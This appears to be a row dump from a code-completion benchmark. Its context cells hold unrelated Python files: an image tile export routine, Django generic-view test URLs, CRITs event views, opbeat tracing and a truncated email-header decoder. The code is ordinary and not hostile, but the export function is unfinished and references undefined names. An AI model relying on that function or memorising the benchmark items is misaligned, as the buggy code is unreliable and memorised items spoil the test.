gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
# TC Backend functions
# Hack to make PIL work with py2exe
import Image
import PngImagePlugin
import JpegImagePlugin
import GifImagePlugin
import BmpImagePlugin
Image._initialized=2
import wx
import wx.lib.masked as masked
import wx.lib.scrolledpanel as scrolled
import wx.lib.hyperlink as hl
import ImageDraw, ImageWin
import sys, os
import pickle, copy
def Export(self, export_dat=1, export_png=1):
"""Exports the cut png image and dat file"""
output_png = "test-output.png"
output_dat = "test-output.dat"
dat_to_png = "test-output"
# Firstly find the path from dat file to png
# Check that both of these are filled out, if png only then
# don't export the dat file and throw Warning
# If dat only then export the dat only, and throw Warning
# If neither, than stop with Error
p = self.active.info.paksize
x_dims = self.active.info.xdims
y_dims = self.active.info.ydims
z_dims = self.active.info.zdims
view_dims = self.active.info.views
winter_dims = self.active.info.winter
front_dims = self.active.info.frontimage
frame_dims = len(self.active.frame)
unit = (xdims,ydims*zdims)
width = view_dims * (unit[0] + unit[0]*winter_dims)
height = frame_dims * (unit[1] + unit[1]*front_dims)
# Create the wxImage and PILImage for the output
img = Image.new("RGBA", (width*p,height*p), color=(231,255,255,0))
if winter_dims == 0:
if front_dims == 0:
ii = [0]
else:
ii = [0,2]
else:
if front_dims == 0:
ii = [0,1]
else:
ii = [0,1,2,3]
for f in range(len(self.active.frame)):
for d in range(self.active.info.views):
for i in ii:
# Make a temp image to copy from
im = self.active.frame[f].direction[d].image[i].image
# If offset is negative...
if self.active.frame[f].direction[d] in [0,2]:
# Normal dimensions
xx = len(self.active.info.xdims)
yy = len(self.active.info.ydims)
else:
# Reverse dimensions
xx = len(self.active.info.ydims)
yy = len(self.active.info.xdims)
zz = self.active.info.zdims
w = (xx + yy) * (p/2)
h = ((xx + yy) * (p/4)) + (p/2) + ((zz - 1) * p)
offset_x = self.active.frame[f].direction[d].image[i].offset_x
offset_y = self.active.frame[f].direction[d].image[i].offset_y
abs_off_x = abs(offset_x)
abs_off_y = abs(offset_y)
if offset_x < 0:
# Image must be moved...
image_offset_x = abs_off_x
else:
image_offset_x = 0
if offset_y < 0:
image_offset_y = abs_off_y
else:
image_offset_y = 0
# Now create a copy of the input image to us...
tempimg = Image.new("RGB", (max([w,im.size[0]])+abs_offx, max([h,im.size[1]])+abs_offy), color=(231,255,255,0))
# And paste this image into it at the right spot
# Paste the base image into the output
tempimg.paste(im,(image_offset_x,image_offset_y))
# Now copy from and mask each bit of the image
for z in range(zz):
for x in range(xx):
for y in range(yy):
# Complex thing to work out where to paste this particular square
if winter_dims == 0:
xpos = (d * unit[0]) + x
else:
# Winter image also
if i in [0,2]:
# If no winter image
xpos = (d * unit[0] * 2) + x
else:
# If winter image
xpos = (d * unit[0] * 2) + unit[0] + x
if front_dims == 0:
ypos = (f * unit[1]) + y
else:
# Front image also
if i in [0,1]:
# If no front image
ypos = (f * unit[1] * 2) + y
else:
# If front image
ypos = (f * unit[1] * 2) + unit[1] + y
img.paste(tempim,(xpos,ypos,xpos+p,ypos+p))
# Masking routine goes here...
img.save("test.png")
# Make image to take outputs from
# If exporting png:
# Frames are primary vertical, then direction horizontally,
# followed by front/back vertically and summer/winter horizontally
# Then the individual cut images
# Even if not exporting png:
# For each one paste into a temporary proto-dat file the image
# array information
# If exporting dat:
# Write out all the necessary file data
def ExportSmoke(self):
"""Exports a smoke object"""
def ExportCursor(self):
"""Exports the cursor/icon for a building"""
class tc:
"""This class contains all the core TileCutter functionality, image manipulation,
exporting, masking etc."""
# Load some image rescources (icons etc.)
class ImRes:
def __init__(self):
self.summer_im = wx.Image("icons/summer-icon.png")
self.summer_im.SetMaskFromImage(self.summer_im,231,255,255)
self.summer = self.summer_im.ConvertToBitmap()
self.winter_im = wx.Image("icons/winter-icon.png")
self.winter_im.SetMaskFromImage(self.winter_im,231,255,255)
self.winter = self.winter_im.ConvertToBitmap()
self.front_im = wx.Image("icons/frontimage-icon.png")
self.front_im.SetMaskFromImage(self.front_im,231,255,255)
self.front = self.front_im.ConvertToBitmap()
self.back_im = wx.Image("icons/backimage-icon.png")
self.back_im.SetMaskFromImage(self.back_im,231,255,255)
self.back = self.back_im.ConvertToBitmap()
self.north_im = wx.Image("icons/north-icon.png")
self.north_im.SetMaskFromImage(self.north_im,231,255,255)
self.north = self.north_im.ConvertToBitmap()
self.east_im = wx.Image("icons/east-icon.png")
self.east_im.SetMaskFromImage(self.east_im,231,255,255)
self.east = self.east_im.ConvertToBitmap()
self.south_im = wx.Image("icons/south-icon.png")
self.south_im.SetMaskFromImage(self.south_im,231,255,255)
self.south = self.south_im.ConvertToBitmap()
self.west_im = wx.Image("icons/west-icon.png")
self.west_im.SetMaskFromImage(self.west_im,231,255,255)
self.west = self.west_im.ConvertToBitmap()
self.reload_im = wx.Image("icons/reloadfile-icon.png")
self.reload_im.SetMaskFromImage(self.reload_im,231,255,255)
self.reload = self.reload_im.ConvertToBitmap()
self.sameforall_im = wx.Image("icons/sameforall-icon.png")
self.sameforall_im.SetMaskFromImage(self.sameforall_im,231,255,255)
self.sameforall = self.sameforall_im.ConvertToBitmap()
self.center_im = wx.Image("icons/center-icon.png")
self.center_im.SetMaskFromImage(self.center_im,231,255,255)
self.center = self.center_im.ConvertToBitmap()
self.x = wx.Image("icons/up-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.up = self.x.ConvertToBitmap()
self.x = wx.Image("icons/up2-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.up2 = self.x.ConvertToBitmap()
self.x = wx.Image("icons/down-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.down = self.x.ConvertToBitmap()
self.x = wx.Image("icons/down2-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.down2 = self.x.ConvertToBitmap()
self.x = wx.Image("icons/left-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.left = self.x.ConvertToBitmap()
self.x = wx.Image("icons/left2-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.left2 = self.x.ConvertToBitmap()
self.x = wx.Image("icons/right-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.right = self.x.ConvertToBitmap()
self.x = wx.Image("icons/right2-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.right2 = self.x.ConvertToBitmap()
self.x = wx.Image("icons/up-right-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.upright = self.x.ConvertToBitmap()
self.x = wx.Image("icons/down-right-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.downright = self.x.ConvertToBitmap()
self.x = wx.Image("icons/up-left-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.upleft = self.x.ConvertToBitmap()
self.x = wx.Image("icons/down-left-icon.png")
self.x.SetMaskFromImage(self.x,231,255,255)
self.downleft = self.x.ConvertToBitmap()
| |
from django.conf.urls.defaults import *
from django.views.generic import TemplateView
import views
urlpatterns = patterns('',
# base
#(r'^about/login-required/$',
# views.DecoratedAboutView()),
# TemplateView
(r'^template/simple/(?P<foo>\w+)/$',
TemplateView.as_view(template_name='generic_views/about.html')),
(r'^template/custom/(?P<foo>\w+)/$',
views.CustomTemplateView.as_view(template_name='generic_views/about.html')),
# DetailView
(r'^detail/obj/$',
views.ObjectDetail.as_view()),
url(r'^detail/artist/(?P<pk>\d+)/$',
views.ArtistDetail.as_view(),
name="artist_detail"),
url(r'^detail/author/(?P<pk>\d+)/$',
views.AuthorDetail.as_view(),
name="author_detail"),
(r'^detail/author/byslug/(?P<slug>[\w-]+)/$',
views.AuthorDetail.as_view()),
(r'^detail/author/(?P<pk>\d+)/template_name_suffix/$',
views.AuthorDetail.as_view(template_name_suffix='_view')),
(r'^detail/author/(?P<pk>\d+)/template_name/$',
views.AuthorDetail.as_view(template_name='generic_views/about.html')),
(r'^detail/author/(?P<pk>\d+)/context_object_name/$',
views.AuthorDetail.as_view(context_object_name='thingy')),
(r'^detail/author/(?P<pk>\d+)/dupe_context_object_name/$',
views.AuthorDetail.as_view(context_object_name='object')),
(r'^detail/page/(?P<pk>\d+)/field/$',
views.PageDetail.as_view()),
(r'^detail/author/invalid/url/$',
views.AuthorDetail.as_view()),
(r'^detail/author/invalid/qs/$',
views.AuthorDetail.as_view(queryset=None)),
# Create/UpdateView
(r'^edit/artists/create/$',
views.ArtistCreate.as_view()),
(r'^edit/artists/(?P<pk>\d+)/update/$',
views.ArtistUpdate.as_view()),
(r'^edit/authors/create/naive/$',
views.NaiveAuthorCreate.as_view()),
(r'^edit/authors/create/redirect/$',
views.NaiveAuthorCreate.as_view(success_url='/edit/authors/create/')),
(r'^edit/authors/create/interpolate_redirect/$',
views.NaiveAuthorCreate.as_view(success_url='/edit/author/%(id)d/update/')),
(r'^edit/authors/create/restricted/$',
views.AuthorCreateRestricted.as_view()),
(r'^edit/authors/create/$',
views.AuthorCreate.as_view()),
(r'^edit/authors/create/special/$',
views.SpecializedAuthorCreate.as_view()),
(r'^edit/author/(?P<pk>\d+)/update/naive/$',
views.NaiveAuthorUpdate.as_view()),
(r'^edit/author/(?P<pk>\d+)/update/redirect/$',
views.NaiveAuthorUpdate.as_view(success_url='/edit/authors/create/')),
(r'^edit/author/(?P<pk>\d+)/update/interpolate_redirect/$',
views.NaiveAuthorUpdate.as_view(success_url='/edit/author/%(id)d/update/')),
(r'^edit/author/(?P<pk>\d+)/update/$',
views.AuthorUpdate.as_view()),
(r'^edit/author/(?P<pk>\d+)/update/special/$',
views.SpecializedAuthorUpdate.as_view()),
(r'^edit/author/(?P<pk>\d+)/delete/naive/$',
views.NaiveAuthorDelete.as_view()),
(r'^edit/author/(?P<pk>\d+)/delete/redirect/$',
views.NaiveAuthorDelete.as_view(success_url='/edit/authors/create/')),
(r'^edit/author/(?P<pk>\d+)/delete/$',
views.AuthorDelete.as_view()),
(r'^edit/author/(?P<pk>\d+)/delete/special/$',
views.SpecializedAuthorDelete.as_view()),
# ArchiveIndexView
(r'^dates/books/$',
views.BookArchive.as_view()),
(r'^dates/books/context_object_name/$',
views.BookArchive.as_view(context_object_name='thingies')),
(r'^dates/books/allow_empty/$',
views.BookArchive.as_view(allow_empty=True)),
(r'^dates/books/template_name/$',
views.BookArchive.as_view(template_name='generic_views/list.html')),
(r'^dates/books/template_name_suffix/$',
views.BookArchive.as_view(template_name_suffix='_detail')),
(r'^dates/books/invalid/$',
views.BookArchive.as_view(queryset=None)),
(r'^dates/books/paginated/$',
views.BookArchive.as_view(paginate_by=10)),
# ListView
(r'^list/dict/$',
views.DictList.as_view()),
(r'^list/dict/paginated/$',
views.DictList.as_view(paginate_by=1)),
url(r'^list/artists/$',
views.ArtistList.as_view(),
name="artists_list"),
url(r'^list/authors/$',
views.AuthorList.as_view(),
name="authors_list"),
(r'^list/authors/paginated/$',
views.AuthorList.as_view(paginate_by=30)),
(r'^list/authors/paginated/(?P<page>\d+)/$',
views.AuthorList.as_view(paginate_by=30)),
(r'^list/authors/notempty/$',
views.AuthorList.as_view(allow_empty=False)),
(r'^list/authors/template_name/$',
views.AuthorList.as_view(template_name='generic_views/list.html')),
(r'^list/authors/template_name_suffix/$',
views.AuthorList.as_view(template_name_suffix='_objects')),
(r'^list/authors/context_object_name/$',
views.AuthorList.as_view(context_object_name='author_list')),
(r'^list/authors/dupe_context_object_name/$',
views.AuthorList.as_view(context_object_name='object_list')),
(r'^list/authors/invalid/$',
views.AuthorList.as_view(queryset=None)),
(r'^list/authors/paginated/custom_class/$',
views.AuthorList.as_view(paginate_by=5, paginator_class=views.CustomPaginator)),
(r'^list/authors/paginated/custom_constructor/$',
views.AuthorListCustomPaginator.as_view()),
# YearArchiveView
# Mixing keyword and possitional captures below is intentional; the views
# ought to be able to accept either.
(r'^dates/books/(?P<year>\d{4})/$',
views.BookYearArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/make_object_list/$',
views.BookYearArchive.as_view(make_object_list=True)),
(r'^dates/books/(?P<year>\d{4})/allow_empty/$',
views.BookYearArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/allow_future/$',
views.BookYearArchive.as_view(allow_future=True)),
(r'^dates/books/no_year/$',
views.BookYearArchive.as_view()),
# MonthArchiveView
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/$',
views.BookMonthArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>\d{1,2})/$',
views.BookMonthArchive.as_view(month_format='%m')),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/allow_empty/$',
views.BookMonthArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/allow_future/$',
views.BookMonthArchive.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/no_month/$',
views.BookMonthArchive.as_view()),
# WeekArchiveView
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/$',
views.BookWeekArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/allow_empty/$',
views.BookWeekArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/allow_future/$',
views.BookWeekArchive.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/week/no_week/$',
views.BookWeekArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/week/(?P<week>\d{1,2})/monday/$',
views.BookWeekArchive.as_view(week_format='%W')),
# DayArchiveView
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/$',
views.BookDayArchive.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/$',
views.BookDayArchive.as_view(month_format='%m')),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/allow_empty/$',
views.BookDayArchive.as_view(allow_empty=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/allow_future/$',
views.BookDayArchive.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/no_day/$',
views.BookDayArchive.as_view()),
# TodayArchiveView
(r'dates/books/today/$',
views.BookTodayArchive.as_view()),
(r'dates/books/today/allow_empty/$',
views.BookTodayArchive.as_view(allow_empty=True)),
# DateDetailView
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/(?P<pk>\d+)/$',
views.BookDetail.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<pk>\d+)/$',
views.BookDetail.as_view(month_format='%m')),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/(?P<pk>\d+)/allow_future/$',
views.BookDetail.as_view(allow_future=True)),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/nopk/$',
views.BookDetail.as_view()),
(r'^dates/books/(?P<year>\d{4})/(?P<month>[a-z]{3})/(?P<day>\d{1,2})/byslug/(?P<slug>[\w-]+)/$',
views.BookDetail.as_view()),
# Useful for testing redirects
(r'^accounts/login/$', 'django.contrib.auth.views.login')
)
| |
import json
import urllib
from django import forms
from django.contrib.auth.decorators import user_passes_test
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from crits.core import form_consts
from crits.core.user_tools import user_can_view_data, user_is_admin
from crits.events.forms import EventForm
from crits.events.handlers import event_remove
from crits.events.handlers import update_event_title, update_event_type
from crits.events.handlers import get_event_details
from crits.events.handlers import generate_event_jtable, add_sample_for_event
from crits.events.handlers import generate_event_csv, add_new_event
from crits.samples.forms import UploadFileForm
from crits.vocabulary.events import EventTypes
@user_passes_test(user_can_view_data)
def events_listing(request, option=None):
"""
Generate Event Listing template.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:param option: Whether or not we should generate a CSV (yes if option is "csv")
:type option: str
:returns: :class:`django.http.HttpResponse`
"""
if option == "csv":
return generate_event_csv(request)
return generate_event_jtable(request, option)
@user_passes_test(user_can_view_data)
def add_event(request):
"""
Add an event to CRITs. Should be an AJAX POST.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
if request.method == "POST" and request.is_ajax():
event_form = EventForm(request.user, request.POST)
if event_form.is_valid():
data = event_form.cleaned_data
result = add_new_event(title=data['title'],
description=data['description'],
event_type=data['event_type'],
source=data['source'],
method=data['method'],
reference=data['reference'],
date=data['occurrence_date'],
bucket_list=data[form_consts.Common.BUCKET_LIST_VARIABLE_NAME],
ticket=data[form_consts.Common.TICKET_VARIABLE_NAME],
analyst=request.user.username)
if 'object' in result:
del result['object']
return HttpResponse(json.dumps(result), content_type="application/json")
else:
return HttpResponse(json.dumps({'form': event_form.as_table(),
'success': False}),
content_type="application/json")
else:
return render_to_response("error.html",
{"error": "Expected AJAX POST"},
RequestContext(request))
@user_passes_test(user_can_view_data)
def event_search(request):
"""
Search for events.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponseRedirect`
"""
query = {}
query[request.GET.get('search_type', '')] = request.GET.get('q', '').strip()
return HttpResponseRedirect(reverse('crits.events.views.events_listing') +
"?%s" % urllib.urlencode(query))
@user_passes_test(user_can_view_data)
def view_event(request, eventid):
"""
View an Event.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:param eventid: The ObjectId of the event to get details for.
:type eventid: str
:returns: :class:`django.http.HttpResponse`
"""
analyst = request.user.username
template = 'event_detail.html'
(new_template, args) = get_event_details(eventid, analyst)
if new_template:
template = new_template
return render_to_response(template,
args,
RequestContext(request))
@user_passes_test(user_can_view_data)
def upload_sample(request, event_id):
"""
Upload a sample to associate with this event.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:param event_id: The ObjectId of the event to associate with this sample.
:type event_id: str
:returns: :class:`django.http.HttpResponse`, :class:`django.http.HttpResponse`
"""
if request.method == 'POST': # and request.is_ajax():
form = UploadFileForm(request.user, request.POST, request.FILES)
if form.is_valid():
email = None
if request.POST.get('email'):
email = request.user.email
result = add_sample_for_event(event_id,
form.cleaned_data,
request.user.username,
request.FILES.get('filedata', None),
request.POST.get('filename', None),
request.POST.get('md5', None),
email,
form.cleaned_data['inherit_sources'])
if result['success']:
result['redirect_url'] = reverse('crits.events.views.view_event', args=[event_id])
return render_to_response('file_upload_response.html',
{'response': json.dumps(result)},
RequestContext(request))
else:
form.fields['related_md5'].widget = forms.HiddenInput() #hide field so it doesn't reappear
return render_to_response('file_upload_response.html',
{'response': json.dumps({'success': False,
'form': form.as_table()})},
RequestContext(request))
else:
return HttpResponseRedirect(reverse('crits.events.views.view_event',
args=[event_id]))
@user_passes_test(user_is_admin)
def remove_event(request, _id):
"""
Remove an Event.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:param _id: The ObjectId of the event to remove.
:type _id: str
:returns: :class:`django.http.HttpResponse`, :class:`django.http.HttpResponse`
"""
result = event_remove(_id, '%s' % request.user.username)
if result['success']:
return HttpResponseRedirect(
reverse('crits.events.views.events_listing')
)
else:
return render_to_response('error.html',
{'error': result['message']},
RequestContext(request))
@user_passes_test(user_can_view_data)
def set_event_title(request, event_id):
"""
Set event title. Should be an AJAX POST.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:param event_id: The ObjectId of the event to update.
:type event_id: str
:returns: :class:`django.http.HttpResponse`
"""
if request.method == 'POST':
analyst = request.user.username
title = request.POST.get('title', None)
return HttpResponse(json.dumps(update_event_title(event_id,
title,
analyst)),
content_type="application/json")
else:
error = "Expected POST"
return render_to_response("error.html",
{"error": error},
RequestContext(request))
@user_passes_test(user_can_view_data)
def set_event_type(request, event_id):
"""
Set event type. Should be an AJAX POST.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:param event_id: The ObjectId of the event to update.
:type event_id: str
:returns: :class:`django.http.HttpResponse`
"""
if request.method == 'POST':
analyst = request.user.username
event_type = request.POST.get('type', None)
return HttpResponse(json.dumps(update_event_type(event_id,
event_type,
analyst)),
content_type="application/json")
else:
error = "Expected POST"
return render_to_response("error.html",
{"error": error},
RequestContext(request))
@user_passes_test(user_can_view_data)
def get_event_type_dropdown(request):
"""
Get a list of available event types.
:param request: Django request object (Required)
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
if request.is_ajax():
e_types = EventTypes.values(sort=True)
result = {'types': e_types}
return HttpResponse(json.dumps(result),
content_type="application/json")
else:
error = "Expected AJAX"
return render_to_response("error.html",
{"error": error},
RequestContext(request))
| |
import functools
import logging
import threading
import time
from datetime import datetime
from collections import defaultdict
from opbeat.utils import get_name_from_func
from opbeat.utils.encoding import force_text
from opbeat.utils.lru import LRUCache
error_logger = logging.getLogger('opbeat.errors')
all = ('trace', )
thread_local = threading.local()
thread_local.transaction_traces = []
thread_local.transaction = None
def get_transaction():
"""
Get the transaction registered for the current thread.
:return:
:rtype: Transaction
"""
return getattr(thread_local, "transaction", None)
class Transaction(object):
_lrucache = LRUCache(maxsize=5000)
def __init__(self, start_time, get_frames, client,
kind="transaction.django"):
self.start_time = start_time
self.get_frames = get_frames
self.client = client
self.transaction_traces = []
self.trace_stack = []
self.ignore_subtree = False
# The transaction is a trace as well
self.begin_trace("transaction", "transaction")
def end_transaction(self, skip_frames=8):
# End the "transaction" trace started above
return self.end_trace(skip_frames)
def begin_trace(self, signature, kind, extra=None, leaf=False):
# If we were already called with `leaf=True`, we'll just push
# a placeholder on the stack.
if self.ignore_subtree:
self.trace_stack.append(None)
return None
if leaf:
self.ignore_subtree = True
abs_start = time.time()
trace = Trace(signature, kind, abs_start, extra)
self.trace_stack.append(trace)
return trace
def end_trace(self, skip_frames):
trace = self.trace_stack.pop()
if trace is None:
return None
self.ignore_subtree = False
duration = (time.time() - trace.abs_start_time)*1000
if self.trace_stack:
parent_start_time = self.trace_stack[-1].abs_start_time
else:
parent_start_time = 0.0
rel_start_time = (trace.abs_start_time - parent_start_time) * 1000
parents = [s.signature for s in self.trace_stack]
trace.parents = tuple(parents)
trace.trace_duration = duration
trace.rel_start_time = rel_start_time
if not self._lrucache.has_key(trace.fingerprint):
self._lrucache.set(trace.fingerprint)
frames = self.get_frames()[skip_frames:]
trace.frames = frames
self.transaction_traces.append(trace)
return trace
class AbstractTrace(object):
def __init__(self, signature, kind, extra):
self.signature = signature
self.kind = kind
self.extra = extra
self.transaction = None
self.transaction_duration = None
self.parents = None
self.frames = None
@property
def fingerprint(self):
return self.transaction, self.parents, self.signature, self.kind
class Trace(AbstractTrace):
def __init__(self, signature, kind, abs_start_time, extra=None, leaf=False):
super(Trace, self).__init__(signature, kind, extra)
self.leaf = leaf
self.abs_start_time = abs_start_time
self.trace_duration = None
self.rel_start_time = None
class TraceGroup(AbstractTrace):
def _decode(self, param):
try:
return force_text(param, strings_only=True)
except UnicodeDecodeError:
return '(encoded string)'
def __init__(self, trace):
super(TraceGroup, self).__init__(trace.signature, trace.kind, trace.extra)
self.parents = trace.parents
self.frames = trace.frames
self.transaction = trace.transaction
self.traces = []
def add(self, trace):
self.traces.append(trace)
def as_dict(self):
# Merge frames into extra
extra = dict(self.extra or {})
if self.frames:
extra['_frames'] = self.frames
return {
"transaction": self.transaction,
"durations": [(t.trace_duration, t.transaction_duration)
for t in self.traces],
"signature": self.signature,
"kind": self.kind,
"parents": self.parents,
"extra": extra,
"start_time": min([t.rel_start_time for t in self.traces]),
}
class _RequestGroup(object):
def __init__(self, transaction, response_code, minute):
self.transaction = transaction
self.response_code = response_code
self.minute = minute
self.durations = []
@property
def fingerprint(self):
return self.transaction, self.response_code, self.minute
def add(self, elapsed):
self.durations.append(elapsed)
def as_dict(self):
return {
"transaction": self.transaction,
"result": self.response_code,
"timestamp": datetime.utcfromtimestamp(self.minute).isoformat() + "Z",
"durations": self.durations
}
class RequestsStore(object):
def __init__(self, get_frames, collect_frequency):
self.cond = threading.Condition()
self._get_frames = get_frames
self._transactions = {}
self._traces = defaultdict(list)
self.collect_frequency = collect_frequency
self._last_collect = time.time()
def _add_transaction(self, elapsed, transaction, response_code):
with self.cond:
requestgroup = _RequestGroup(transaction, response_code,
int(time.time()/60)*60)
if requestgroup.fingerprint not in self._transactions:
self._transactions[requestgroup.fingerprint] = requestgroup
self._transactions[requestgroup.fingerprint].add(elapsed)
self.cond.notify()
def get_all(self, blocking=False):
with self.cond:
# If blocking is true, always return at least 1 item
while blocking and len(self._traces) == 0:
self.cond.wait()
transactions, self._transactions = self._transactions, {}
traces, self._traces = self._traces, {}
self._last_collect = time.time()
return ([v.as_dict() for v in transactions.values()],
[v.as_dict() for v in traces.values()],)
def should_collect(self):
return (time.time() - self._last_collect) >= self.collect_frequency
def __len__(self):
with self.cond:
return sum([len(v.durations) for v in self._transactions.values()])
def transaction_start(self, client, kind):
"""
Start a new transactions and bind it in a thread-local variable
"""
thread_local.transaction = Transaction(
time.time(),
self._get_frames,
client,
kind,
)
def _add_traces(self, traces):
with self.cond:
for trace in traces:
if trace.fingerprint not in self._traces:
self._traces[trace.fingerprint] = TraceGroup(trace)
self._traces[trace.fingerprint].add(trace)
self.cond.notify()
def transaction_end(self, response_code, transaction_name):
transaction = get_transaction()
if transaction:
elapsed = (time.time() - transaction.start_time)*1000
transaction.end_transaction()
transaction_traces = transaction.transaction_traces
# Take all the traces accumulated during the transaction,
# set the transaction name on them and merge them into the dict
for trace in transaction_traces:
trace.transaction = transaction_name
trace.transaction_duration = elapsed
self._add_traces(transaction_traces)
self._add_transaction(elapsed, transaction_name,
response_code)
# Reset thread local transaction to subsequent call to this method
# behaves as expected.
thread_local.transaction = None
class trace(object):
def __init__(self, signature=None, kind='code.custom', extra=None,
skip_frames=0, leaf=False):
self.signature = signature
self.kind = kind
self.extra = extra
self.skip_frames = skip_frames
self.leaf = leaf
self.transaction = None
def __call__(self, func):
self.signature = self.signature or get_name_from_func(func)
@functools.wraps(func)
def decorated(*args, **kwds):
with self:
return func(*args, **kwds)
return decorated
def __enter__(self):
self.transaction = get_transaction()
if self.transaction:
self.transaction.begin_trace(self.signature, self.kind, self.extra,
self.leaf)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.transaction:
self.transaction.end_trace(self.skip_frames)
| |
# Copyright (C) 2002-2007 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: email-sig@python.org
"""Header encoding and decoding functionality."""
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future.builtins import bytes, range, str, super, zip
__all__ = [
'Header',
'decode_header',
'make_header',
]
import re
import binascii
from future.backports import email
from future.backports.email import base64mime
from future.backports.email.errors import HeaderParseError
import future.backports.email.charset as _charset
# Helpers
from future.backports.email.quoprimime import _max_append, header_decode
Charset = _charset.Charset
NL = '\n'
SPACE = ' '
BSPACE = b' '
SPACE8 = ' ' * 8
EMPTYSTRING = ''
MAXLINELEN = 78
FWS = ' \t'
USASCII = Charset('us-ascii')
UTF8 = Charset('utf-8')
# Match encoded-word strings in the form =?charset?q?Hello_World?=
ecre = re.compile(r'''
=\? # literal =?
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
\? # literal ?
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
\? # literal ?
(?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string
\?= # literal ?=
''', re.VERBOSE | re.IGNORECASE | re.MULTILINE)
# Field name regexp, including trailing colon, but not separating whitespace,
# according to RFC 2822. Character range is from tilde to exclamation mark.
# For use with .match()
fcre = re.compile(r'[\041-\176]+:$')
# Find a header embedded in a putative header value. Used to check for
# header injection attack.
_embeded_header = re.compile(r'\n[^ \t]+:')
def decode_header(header):
"""Decode a message header value without converting charset.
Returns a list of (string, charset) pairs containing each of the decoded
parts of the header. Charset is None for non-encoded parts of the header,
otherwise a lower-case string containing the name of the character set
specified in the encoded string.
header may be a string that may or may not contain RFC2047 encoded words,
or it may be a Header object.
An email.errors.HeaderParseError may be raised when certain decoding error
occurs (e.g. a base64 decoding exception).
"""
# If it is a Header object, we can just return the encoded chunks.
if hasattr(header, '_chunks'):
return [(_charset._encode(string, str(charset)), str(charset))
for string, charset in header._chunks]
# If no encoding, just return the header with no charset.
if not ecre.search(header):
return [(header, None)]
# First step is to parse all the encoded parts into triplets of the form
# (encoded_string, encoding, charset). For unencoded strings, the last
# two parts will be None.
words = []
for line in header.splitlines():
parts = ecre.split(line)
first = True
while parts:
unencoded = parts.pop(0)
if first:
unencoded = unencoded.lstrip()
first = False
if unencoded:
words.append((unencoded, None, None))
if parts:
charset = parts.pop(0).lower()
encoding = parts.pop(0).lower()
encoded = parts.pop(0)
words.append((encoded, encoding, charset))
# Now loop over words and remove words that consist of whitespace
# between two encoded strings.
import sys
droplist = []
for n, w in enumerate(words):
if n > 1 and w[1] and words[n - 2][1] and words[n - 1][0].isspace():
droplist.append(n - 1)
for d in reversed(droplist):
del words[d]
# The next step is to decode each encoded word by applying the reverse
# base64 or quopri transformation. decoded_words is now a list of the
# form (decoded_word, charset).
decoded_words = []
for encoded_string, encoding, charset in words:
if encoding is None:
# This is an unencoded word.
decoded_words.append((encoded_string, charset))
elif encoding == 'q':
word = header_decode(encoded_string)
decoded_words.append((word, charset))
elif encoding == 'b':
paderr = len(encoded_string) % 4 # Postel's law: add missing padding
if paderr:
encoded_string += '==='[:4 - paderr]
try:
word = base64mime.decode(encoded_string)
except binascii.Error:
raise HeaderParseError('Base64 decoding error')
else:
decoded_words.append((word, charset))
else:
